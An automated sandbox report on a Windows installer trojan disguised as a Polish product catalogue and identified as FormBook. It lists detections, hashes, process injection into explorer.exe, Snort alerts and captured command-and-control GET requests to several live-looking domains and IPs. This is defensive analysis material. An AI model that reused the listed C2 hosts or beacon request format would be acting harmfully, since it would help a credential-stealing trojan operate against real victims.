          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Security Software Discovery 251 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | Virtualization/Sandbox Evasion 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing 1 | LSA Secrets | Process Discovery 2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 114 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          [Behavior graph (image not preserved). Behavior Graph ID: 515499; Sample: nowy przyk#U0142adowy katalog.exe; Startdate: 04/11/2021; Architecture: WINDOWS; Score: 100. Process chain: nowy przyk#U0142adowy katalog.exe (drops C:\Users\user\AppData\Local\...\rarelsbsy.dll, PE32) started nowy przyk#U0142adowy katalog.exe, which injected explorer.exe; explorer.exe started cmstp.exe, which started cmd.exe, which started conhost.exe.]


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          nowy przyk#U0142adowy katalog.exe | 30% | ReversingLabs | Win32.Backdoor.Zapchast
          nowy przyk#U0142adowy katalog.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll | 14% | ReversingLabs | Win32.Backdoor.Zapchast

          Unpacked PE Files

          Source | Detection | Scanner | Label
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          11.2.cmstp.exe.4b5796c.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
          1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          0.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          11.2.cmstp.exe.3bbc28.1.unpack | 100% | Avira | TR/Patched.Ren.Gen

          Domains

          Source | Detection | Scanner
          harada-insatsu.com | 0% | Virustotal
          bezhantrading.com | 6% | Virustotal
          www.iccsukltd.com | 1% | Virustotal

          URLs


          Domains and IPs

          Contacted Domains


                                        Contacted URLs


                                        URLs from Memory and Binaries

                                        Name | Source | Malicious | Antivirus Detection | Reputation
                                        http://www.autoitscript.com/autoit3/J | explorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmp | false | | high
                                        http://nsis.sf.net/NSIS_Error | nowy przyk#U0142adowy katalog.exe | false | | high
                                        http://nsis.sf.net/NSIS_ErrorError | nowy przyk#U0142adowy katalog.exe | false | | high
                                        http://browsehappy.com/ | cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmp | false | | high

                                                Contacted IPs


                                                Public


                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:515499
                                                Start date:04.11.2021
                                                Start time:11:46:58
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:nowy przyk#U0142adowy katalog.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:20
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@7/2@11/9
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 31.3% (good quality ratio 28.4%)
                                                • Quality average: 73.6%
                                                • Quality standard deviation: 31.7%
                                                HCA Information:
                                                • Successful, ratio: 86%
                                                • Number of executed functions: 99
                                                • Number of non-executed functions: 85
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.49.150.241, 51.11.168.232
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, settingsfd-geo.trafficmanager.net
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                No simulations

                                                Joe Sandbox View / Context

                                                IPs


                                                Domains

                                                Match | Associated Sample Name / URL | Detection | Context
                                                www.iccsukltd.com | EQ034989.exe | malicious | 217.160.0.33
                                                www.affiliatemarketingproducts.xyz | EQ034989.exe | malicious | 172.67.184.156
                                                www.affiliatemarketingproducts.xyz | cat#U00e1logo de productos2021.exe | malicious | 172.67.184.156

                                                ASN


                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Local\Temp\hx6dizitwtz0f0aat
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):215803
                                                Entropy (8bit):7.994628213154947
                                                Encrypted:true
                                                SSDEEP:6144:1JIHtqEX3rWyncHSnlF1rYZYlz8gT6t+jGR:rwtbFncHc1cES+jGR
                                                MD5:61C9526BC0572C9F55C5C8A52AA67AC4
                                                SHA1:AAF907310F5A183328EC227BF2906F27574C55AB
                                                SHA-256:07AD9970509EAE7E01E04D18A115D789DF7670118F0A987F8A83270C42B6497A
                                                SHA-512:5542F3A7D19984BBF21940E64BC0C37D3ECE44942D7BECAD81F3F5E4E9180762E937A1AD3DB92EFF15F2440A0E65C09458B7D4397C2E77400E78FA1F39C205F6
                                                Malicious:false
                                                Reputation:low
                                                C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll
                                                Process:C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe
                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):88064
                                                Entropy (8bit):6.428072489806541
                                                Encrypted:false
                                                SSDEEP:1536:coflsP2XNvIZy4K+PBtk7iHyX3SWzwQ9cIbUfs44UVxY2Qz:coOPkvLz+vk7Z+VxI
                                                MD5:CC4DEBEED38EA20DB5A0D2AFA03EFBEA
                                                SHA1:873E13909531B81E8B1DBDFBB8BC2AE317F73563
                                                SHA-256:6E7DC09D3A59CC7391C009BD8F8A70360CEBAFE87E817E44CD359A935DBF2617
                                                SHA-512:994E3BBB97B2B17C9A3A1DECBDB6FCEEBCA48F0384C85D568261736B42F3FF716AFA9A94511BEF5A4A2A1975651FE4F007EEC93C338381F596B47C1122658236
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 14%
                                                Reputation:low

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.512989604965828
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:nowy przyk#U0142adowy katalog.exe
                                                File size:422298
                                                MD5:cbe0e49106fad96b2c1c155ce5b22abd
                                                SHA1:25a9a38c80446b631fc1de30440caba41ff8ec74
                                                SHA256:a13cc23d40c93805a7305e090f5faf55d60b440e6d674ac333980ecd6c94bc60
                                                SHA512:013931e807edc454697dab78f81c54a3c1433970916ae2ca91dee03e03a04d1ae19b32eccd05fd44c5492a3b6c0c5080aeaaaba8329c5ca2b3cc39cb2c1c5f67
                                                SSDEEP:6144:68LxBzme9UeFrAmvGfHHolKxTcE0RAF1r1qzXRgT6t+jZadV1ACLSDBQqK07:c3eFrAmv1lQApm1wz2S+jZyr8K07

                                                File Icon

                                                Icon Hash:70c8d0e0ccd4f0d0

                                                Static PE Info

                                                General

                                                Entrypoint:0x40312a
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 00000184h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebx
                                                mov dword ptr [esp+14h], 00409168h
                                                mov dword ptr [esp+1Ch], ebx
                                                mov byte ptr [esp+18h], 00000020h
                                                call dword ptr [004070B0h]
                                                call dword ptr [004070ACh]
                                                cmp ax, 00000006h
                                                je 00007FBC547D84F3h
                                                push ebx
                                                call 00007FBC547DB2D4h
                                                cmp eax, ebx
                                                je 00007FBC547D84E9h
                                                push 00000C00h
                                                call eax
                                                mov esi, 00407280h
                                                push esi
                                                call 00007FBC547DB250h
                                                push esi
                                                call dword ptr [00407108h]
                                                lea esi, dword ptr [esi+eax+01h]
                                                cmp byte ptr [esi], bl
                                                jne 00007FBC547D84CDh
                                                push 0000000Dh
                                                call 00007FBC547DB2A8h
                                                push 0000000Bh
                                                call 00007FBC547DB2A1h
                                                mov dword ptr [0042EC24h], eax
                                                call dword ptr [00407038h]
                                                push ebx
                                                call dword ptr [0040726Ch]
                                                mov dword ptr [0042ECD8h], eax
                                                push ebx
                                                lea eax, dword ptr [esp+38h]
                                                push 00000160h
                                                push eax
                                                push ebx
                                                push 00429058h
                                                call dword ptr [0040715Ch]
                                                push 0040915Ch
                                                push 0042E420h
                                                call 00007FBC547DAED4h
                                                call dword ptr [0040710Ch]
                                                mov ebp, 00434000h
                                                push eax
                                                push ebp
                                                call 00007FBC547DAEC2h
                                                push ebx
                                                call dword ptr [00407144h]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                Name | Virtual Address | Virtual Size | Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7524 | 0xa0 | .rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x37000 | 0x1fcb8 | .rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x27c | .rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                Sections

                                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                .text | 0x1000 | 0x5e66 | 0x6000 | False | 0.670572916667 | data | 6.44065573436 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata | 0x7000 | 0x12a2 | 0x1400 | False | 0.4455078125 | data | 5.0583287871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data | 0x9000 | 0x25d18 | 0x600 | False | 0.458984375 | data | 4.18773476617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata | 0x2f000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc | 0x37000 | 0x1fcb8 | 0x1fe00 | False | 0.38359375 | data | 5.99100948906 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                Name | RVA | Size | Type | Language | Country
                                                RT_ICON | 0x37280 | 0x10828 | dBase III DBT, version number 0, next free block index 40 | English | United States
                                                RT_ICON | 0x47aa8 | 0x6f7a | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                                RT_ICON | 0x4ea28 | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x52c50 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x551f8 | 0x10a8 | dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0 | English | United States
                                                RT_ICON | 0x562a0 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                                RT_DIALOG | 0x56708 | 0x100 | data | English | United States
                                                RT_DIALOG | 0x56808 | 0x11c | data | English | United States
                                                RT_DIALOG | 0x56928 | 0x60 | data | English | United States
                                                RT_GROUP_ICON | 0x56988 | 0x5a | data | English | United States
                                                RT_MANIFEST | 0x569e8 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

                                                Imports

                                                DLL | Import
                                                KERNEL32.dll | GetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                USER32.dll | SetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                ADVAPI32.dll | RegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                Possible Origin

                                                Language of compilation system | Country where language is spoken
                                                English | United States

                                                Network Behavior

                                                Snort IDS Alerts

                                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                11/04/21-11:49:10.345950 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49760 | 34.102.136.180 | 192.168.2.6
                                                11/04/21-11:49:15.409408 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.409408 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.409408 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49766 | 80 | 192.168.2.6 | 34.102.136.180
                                                11/04/21-11:49:15.526365 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49766 | 34.102.136.180 | 192.168.2.6
                                                11/04/21-11:49:26.412220 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                11/04/21-11:49:26.412220 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206
                                                11/04/21-11:49:26.412220 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49773 | 80 | 192.168.2.6 | 153.127.214.206

                                                Network Port Distribution

                                                TCP Packets


                                                UDP Packets


                                                DNS Queries


                                                DNS Answers


                                                HTTP Request Dependency Graph

                                                • www.worryterrible.space
                                                • www.americanvisionvinyl.com
                                                • www.iccsukltd.com
                                                • www.harada-insatsu.com
                                                • www.affiliatemarketingproducts.xyz
                                                • www.bezhantrading.com
                                                • www.alles-abgedeckt.com
                                                • www.leads-mania.club
                                                • www.tankomixing.com

                                                HTTP Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.6 | 49760 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:10.230787992 CET | 1211 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw== HTTP/1.1
                                                Host: www.worryterrible.space
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:10.345949888 CET | 1211 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:10 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182ae77-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                1 | 192.168.2.6 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:15.409408092 CET | 5924 | OUT | GET /wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.americanvisionvinyl.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:15.526365042 CET | 5924 | IN | HTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 04 Nov 2021 10:49:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 275
                                                ETag: "6182b3d6-113"
                                                Via: 1.1 google
                                                Connection: close
                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                2 | 192.168.2.6 | 49770 | 217.160.0.33 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:20.590734005 CET | 7551 | OUT | GET /wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw== HTTP/1.1
                                                Host: www.iccsukltd.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:20.613830090 CET | 7552 | IN | HTTP/1.1 302 Moved Temporarily
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:20 GMT
                                                Content-Type: text/html
                                                Content-Length: 138
                                                Connection: close
                                                Location: https://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==
                                                Expires: Thu, 04 Nov 2021 11:09:20 GMT
                                                Cache-Control: max-age=1200
                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                3 | 192.168.2.6 | 49773 | 153.127.214.206 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:26.412220001 CET | 7561 | OUT | GET /wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.harada-insatsu.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:27.061523914 CET | 7561 | IN | HTTP/1.1 301 Moved Permanently
                                                Server: nginx
                                                Date: Thu, 04 Nov 2021 10:49:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Content-Length: 0
                                                Connection: close
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Location: http://harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                4 | 192.168.2.6 | 49774 | 172.67.184.156 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:36.988871098 CET | 7563 | OUT | GET /wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.affiliatemarketingproducts.xyz
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:37.027247906 CET | 7564 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Thu, 04 Nov 2021 10:49:37 GMT
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Thu, 04 Nov 2021 11:49:37 GMT
                                                Location: https://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SPswaYNzBNI3Kt4mtbfGsNGfaa%2FkZUQW2IRP4os7vY69Hkz9OlKNWJOADCzrBTJzBOFhRTVCuWC4G%2FBpJgHLPTtPcRGkhO%2B8zEWipfS%2BaMIRKeeVD0wb5edUjB31NBc2rZfYdeH8pNowyK5alp3qulaeUFLI"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 6a8d46d64fc84c5b-AMS
                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                5 | 192.168.2.6 | 49776 | 104.248.163.187 | 80 | C:\Windows\explorer.exe
                                                Timestamp | kBytes transferred | Direction | Data
                                                Nov 4, 2021 11:49:47.179642916 CET | 7569 | OUT | GET /wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0 HTTP/1.1
                                                Host: www.bezhantrading.com
                                                Connection: close
                                                Data Raw: 00 00 00 00 00 00 00
                                                Data Ascii:
                                                Nov 4, 2021 11:49:47.760755062 CET | 7570 | IN | HTTP/1.1 301 Moved Permanently
                                                Connection: close
                                                content-type: text/html; charset=UTF-8
                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                cache-control: no-cache, must-revalidate, max-age=0
                                                x-redirect-by: WordPress
                                                location: http://bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0
                                                content-length: 0
